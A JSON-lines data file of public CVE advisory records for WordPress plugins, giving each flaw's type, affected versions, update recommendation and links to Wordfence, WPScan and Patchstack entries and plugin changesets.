{"CVE_ID":"CVE-2023-0096","slug":"happyforms","versionEndExcluding":"1.22.0","description":"The Happyforms WordPress plugin before 1.22.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28150e7-214b-4bcd-85c0-e819c4223484\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28150e7-214b-4bcd-85c0-e819c4223484\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7295","slug":"video-grid","versionImpact":"1.21","versionEndExcluding":"1.22","description":"The Video Grid plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5247ad-dbbf-4d8e-92f5-3a673b97d080?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5247ad-dbbf-4d8e-92f5-3a673b97d080?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824307%40video-grid%2Ftags%2F1.21&new=2900422%40video-grid%2Ftags%2F1.22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824307%40video-grid%2Ftags%2F1.21&new=2900422%40video-grid%2Ftags%2F1.22\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11418","slug":"additional-order-filters-for-woocommerce","versionImpact":"1.21","versionEndExcluding":"1.22","description":"The Additional Order Filters for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shipping_method_filter' parameter in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195214%40additional-order-filters-for-woocommerce&new=3195214%40additional-order-filters-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3195214%40additional-order-filters-for-woocommerce&new=3195214%40additional-order-filters-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59ea96f-ad02-4189-8155-7de7de5556ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d59ea96f-ad02-4189-8155-7de7de5556ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10583","slug":"popup-maker","versionImpact":"1.20.2","versionEndExcluding":"1.20.3","description":"The Popup Maker \u2013 Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018post_title\u2019 parameter in all versions up to, and including, 1.20.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.20.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197898%40popup-maker&new=3197898%40popup-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197898%40popup-maker&new=3197898%40popup-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b4dc917-0d59-4163-a613-49afc1dc4d33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b4dc917-0d59-4163-a613-49afc1dc4d33?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50849","slug":"e2pdf","versionEndExcluding":"1.20.24","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in E2Pdf.Com E2Pdf \u2013 Export To Pdf Tool for WordPress.This issue affects E2Pdf \u2013 Export To Pdf Tool for WordPress: from n\/a through 1.20.23.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-23-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-23-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5229","slug":"e2pdf","versionEndExcluding":"1.20.20","description":"The E2Pdf WordPress plugin before 1.20.20 does not sanitize and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed","recommendation":"Update to version 1.20.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb6ce636-9e0d-4c5c-bb95-dde1d2581245\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb6ce636-9e0d-4c5c-bb95-dde1d2581245\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9219","slug":"share-button","versionImpact":"1.19","versionEndExcluding":"1.20","description":"The WordPress Social Share Buttons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19aa8ca-0ce8-4a9a-8f71-7d7e67e8f99b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19aa8ca-0ce8-4a9a-8f71-7d7e67e8f99b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/1.19\\\/share-button\\\/trunk\\\/admin\\\/page_editor.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/1.19\\\/share-button\\\/trunk\\\/admin\\\/page_editor.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-button\\\/tags\\\/1.19\\\/admin\\\/page_editor.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-button\\\/tags\\\/1.19\\\/admin\\\/page_editor.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171315\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3295","slug":"wp-editor","versionImpact":"1.2.9.1","versionEndExcluding":"1.2.9.2","description":"The WP Editor plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.2.9.1. This makes it possible for authenticated attackers, with Administrator-level access and above, to read arbitrary files on the affected site's server which may reveal sensitive information.","recommendation":"Update to version 1.2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4618c1f4-c0aa-47f5-8c0b-2cb4a021f2e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4618c1f4-c0aa-47f5-8c0b-2cb4a021f2e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3294","slug":"wp-editor","versionImpact":"1.2.9.1","versionEndExcluding":"1.2.9.2","description":"The WP Editor plugin for WordPress is vulnerable to arbitrary file update due to missing file path validation in all versions up to, and including, 1.2.9.1. This makes it possible for authenticated attackers, with Administrator-level access and above, to overwrite arbitrary files on the affected site's server which may make remote code execution possible assuming the files can be written to by the web server.","recommendation":"Update to version 1.2.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3269832%40wp-editor%2Ftrunk&old=3151053%40wp-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9298820e-3753-41b3-8ba6-9fb494e215a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9298820e-3753-41b3-8ba6-9fb494e215a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2446","slug":"wp-editor","versionImpact":"1.2.9","versionEndExcluding":"1.2.9.1","description":"The WP Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'current_theme_root' parameter in versions up to, and including 1.2.9. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.","recommendation":"Update to version 1.2.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3555702-4427-4569-8fd6-f84113593e9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3555702-4427-4569-8fd6-f84113593e9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151053\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151053\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2232","slug":"realteo","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The Realteo - Real Estate Plugin by Purethemes plugin for WordPress, used by the Findeo Theme, is vulnerable to authentication bypass in all versions up to, and including, 1.2.8. This is due to insufficient role restrictions in the 'do_register_user' function. This makes it possible for unauthenticated attackers to register an account with the Administrator role.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.purethemes.net\\\/findeo\\\/knowledge-base\\\/changelog-findeo\\\/\",\"name\":\"https:\\\/\\\/docs.purethemes.net\\\/findeo\\\/knowledge-base\\\/changelog-findeo\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe73ecd-1325-4d6d-8545-d27f6116ca43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe73ecd-1325-4d6d-8545-d27f6116ca43?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9888","slug":"elementinvader-addons-for-elementor","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's contact form widget redirect URL in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba9d12c5-fe3a-4958-8d35-c63bb05b6d5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba9d12c5-fe3a-4958-8d35-c63bb05b6d5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168782\\\/elementinvader-addons-for-elementor\\\/trunk\\\/modules\\\/forms\\\/ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168782\\\/elementinvader-addons-for-elementor\\\/trunk\\\/modules\\\/forms\\\/ajax-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10110","slug":"tinychat-roomspy","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"A vulnerability classified as problematic was found in ruddernation TinyChat Room Spy Plugin up to 1.2.8 on WordPress. This vulnerability affects the function wp_show_room_spy of the file room-spy.php. The manipulation of the argument room leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.2.9 is able to address this issue. The name of the patch is ab72627a963d61fb3bc31018e3855b08dc94a979. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230392.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230392\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230392\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230392\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230392\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/tinychat-roomspy\\\/commit\\\/ab72627a963d61fb3bc31018e3855b08dc94a979\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/tinychat-roomspy\\\/commit\\\/ab72627a963d61fb3bc31018e3855b08dc94a979\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2503","slug":"wd-facebook-feed","versionEndExcluding":"1.2.9","description":"The 10Web Social Post Feed WordPress plugin before 1.2.9 does not sanitise and escape some parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b1caf1-d00b-4075-b71a-0516d5604286\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b1caf1-d00b-4075-b71a-0516d5604286\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5235","slug":"ovic-vc-addon","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The Ovic Responsive WPBakery WordPress plugin before 1.2.9 does not limit which options can be updated via some of its AJAX actions, which may allow attackers with a subscriber+ account to update blog options, such as 'users_can_register' and 'default_role'. It also unserializes user input in the process, which may lead to Object Injection attacks.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35c9a954-37fc-4818-a71f-34aaaa0fa3db\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/35c9a954-37fc-4818-a71f-34aaaa0fa3db\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12432","slug":"wpc-shop-as-customer","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208130%40wpc-shop-as-customer&new=3208130%40wpc-shop-as-customer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208130%40wpc-shop-as-customer&new=3208130%40wpc-shop-as-customer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048625e8-10b7-418d-a13b-329f1d7e0171?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048625e8-10b7-418d-a13b-329f1d7e0171?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13572","slug":"precious-metals-chart-and-widgets","versionImpact":"1.2.8","versionEndExcluding":"1.2.9","description":"The Precious Metals Charts and Widgets for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'nfusion-widget' shortcode in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227123%40precious-metals-chart-and-widgets&new=3227123%40precious-metals-chart-and-widgets&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227123%40precious-metals-chart-and-widgets&new=3227123%40precious-metals-chart-and-widgets&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f2c8c5f-2017-4b22-a864-dc142b3b1afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f2c8c5f-2017-4b22-a864-dc142b3b1afb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2130","slug":"cww-companion","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The CWW Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Module2 widget in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d82d43b9-4c70-4525-88ba-eec7c81a62c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049008%40cww-companion&new=3049008%40cww-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10532","slug":"bard-extra","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Bard Extra plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bardxtra_import_xml() function in all versions up to, and including, 1.2.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to import demo data.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bard-extra\\\/trunk\\\/bard-extra.php#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bard-extra\\\/trunk\\\/bard-extra.php#L341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad5d2b2-fca8-46bb-8a03-02be07f2a800?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad5d2b2-fca8-46bb-8a03-02be07f2a800?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11106","slug":"simple-restrict","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.7 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198971\\\/simple-restrict\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198971\\\/simple-restrict\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb50bc9-5ad7-402e-a624-90f3302e1b0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb50bc9-5ad7-402e-a624-90f3302e1b0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4469","slug":"profile-extra-fields","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Profile Extra Fields by BestWebSoft plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the prflxtrflds_export_file function in versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to expose potentially sensitive user data, including data entered into custom fields.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916c73e8-a150-4b35-8773-ea0ec29f7fd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916c73e8-a150-4b35-8773-ea0ec29f7fd1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975179\\\/profile-extra-fields\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975179\\\/profile-extra-fields\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0503","slug":"99fy-core","versionEndExcluding":"1.2.8","description":"The Free WooCommerce Theme 99fy Extension WordPress plugin before 1.2.8 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cb148fb-1f30-4316-a421-10da51d849f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cb148fb-1f30-4316-a421-10da51d849f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0443","slug":"anywhere-elementor","versionEndExcluding":"1.2.8","description":"The AnyWhere Elementor WordPress plugin before 1.2.8 discloses a Freemius Secret Key which could be used by an attacker to purchase the pro subscription using test credit card numbers without actually paying the amount. Such key has been revoked.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/471f3226-8f90-43d1-b826-f11ef4bbd602\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/471f3226-8f90-43d1-b826-f11ef4bbd602\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2294","slug":"backuply","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Backuply \u2013 Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.7 via the backup_name parameter in the backuply_download_backup function. This makes it possible for attackers to have an account with only activate_plugins capability to access arbitrary files on the server, which can contain sensitive information. This only impacts sites hosted on Windows servers.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/main\\\/ajax.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/main\\\/ajax.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1615\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1615\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10795","slug":"popularis-extra","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Popularis Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.7 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5de554-1d2f-4932-9f93-1333b07edeba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5de554-1d2f-4932-9f93-1333b07edeba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185542%40popularis-extra&new=3185542%40popularis-extra&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185542%40popularis-extra&new=3185542%40popularis-extra&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8046","slug":"injection-guard","versionImpact":"1.2.7","versionEndExcluding":"1.2.8","description":"The Injection Guard WordPress plugin before 1.2.8 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 1.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14a53525-8c08-472d-bae4-b3f14368b802\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
